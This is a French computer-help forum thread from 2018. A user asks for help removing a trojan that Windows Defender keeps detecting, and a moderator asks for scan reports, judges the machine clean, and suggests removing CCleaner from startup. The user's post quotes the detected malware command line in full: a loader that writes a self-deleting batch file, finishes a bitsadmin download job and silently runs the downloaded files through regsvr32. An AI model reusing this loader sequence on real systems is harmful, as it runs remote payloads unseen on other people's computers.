Trojan win32 starter R - impossible à éradiquer

Résolu/Fermé
Val.b2 Messages postés 3 Date d'inscription mardi 23 octobre 2018 Statut Membre Dernière intervention 24 octobre 2018 - 23 oct. 2018 à 04:44
Val.b2 Messages postés 3 Date d'inscription mardi 23 octobre 2018 Statut Membre Dernière intervention 24 octobre 2018 - 24 oct. 2018 à 00:23
Bonjour,
Voilà depuis quelques jours que j'essaie (en vain) de supprimer un trojan. J'ai tenté plusieurs tentatives (scan complet avec ESET, microsoft safety scanner, windows defender en mode sans échec) mais résultats : toujours 0 fichiers infectés.
Alors que Windows defender me trouve régulièrement un fichier infecté (trojan Win32/starter-R : CmdLine: \Device\HarddiskVolume3\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\c905dede-7603-1\x.bat" & echo bitsadmin /complete c905dede-7603-1 ^> nul >> "C:\ProgramData\c905dede-7603-1\x.bat" & echo bitsadmin /cancel c905dede-7603-1 ^> nul >> "C:\ProgramData\c905dede-7603-1\x.bat" & echo if exist "C:\ProgramData\c905dede-7603-1\c905dede-7603-1.d" goto q >> "C:\ProgramData\c905dede-7603-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\c905dede-7603-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=3808fcc8c905dede " "C:\ProgramData\c905dede-7603-1\%i" >> "C:\ProgramData\c905dede-7603-1\x.bat")) > nul & echo :q >> "C:\ProgramData\c905dede-7603-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=3808fcc8c905dede " "C:\ProgramData\c905dede-7603-1\c905dede-7603-1.d" >> "C:\ProgramData\c905dede-7603-1\x.bat" & echo del "C:\ProgramData\c905dede-7603-1\x.bat" ^& exit >> "C:\ProgramData\c905dede-7603-1\x.bat" & "C:\ProgramData\c905dede-7603-1\x.bat"") qu'il place en quarantaine automatiquement

Je pense que mon PC est depuis sérieusement ralenti.

Merci de votre aide
Bonne journée
A voir également:

4 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
23 oct. 2018 à 08:35
Salut,

Donne le rapport de scan NOD32 et :

Pour vérifier l'ordinateur, je t'invite à faire cette analyse FRST et donner les rapports en retour :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ afin de les partager.
En retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


0
Val.b2 Messages postés 3 Date d'inscription mardi 23 octobre 2018 Statut Membre Dernière intervention 24 octobre 2018
23 oct. 2018 à 21:06
Bonjour,
Ci joint mes 4 rapports (3 rapport de FRST et une capture d'écran de NOD32)

https://pjjoint.malekal.com/files.php?id=FRST_20181023_i6i7o5f13q9
https://pjjoint.malekal.com/files.php?id=20181023_j15x6j11k12s7
https://pjjoint.malekal.com/files.php?id=20181023_d5t12x11r15u13

https://pjjoint.malekal.com/files.php?id=20181023_t7r8b14c9b15

Je ne sais pas si mon ordinateur est bien infecté ou si c'est un faux positif car tout les scans antivirus rendent un résultat négatif
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
Modifié le 23 oct. 2018 à 21:46
Non pas un faux positif mais tu sembles l'avoir éradiqué.

CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu veux le garder, désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/

Apparemment, tu as créé un sujet sur un autre forum.
Ca ne sert à rien de multiplier les demandes.

0
Val.b2 Messages postés 3 Date d'inscription mardi 23 octobre 2018 Statut Membre Dernière intervention 24 octobre 2018
24 oct. 2018 à 00:23
Bonjour,
Je vais supprimer Ccleaner.
Merci pour votre réponse
0